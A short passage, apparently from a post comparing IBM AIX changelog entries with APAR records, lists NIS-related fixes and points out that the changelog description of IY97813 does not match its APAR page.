RPC.NISPASSWDD DOES NOT USE -C OPTION IN THE CORRECT MANNER IY95913 YPPASSWD FAILS FOR NIS USER WITH LONG NAME(>8 CHARACTERS) And finally, one changelog entry that doesn't jibe with the APAR entry. http://www-1.ibm.com/support/docview.wss?uid=isg1IY97813 Changelog: IY97813 srcmstr crash APAR: IY97813: NEW FUNCTION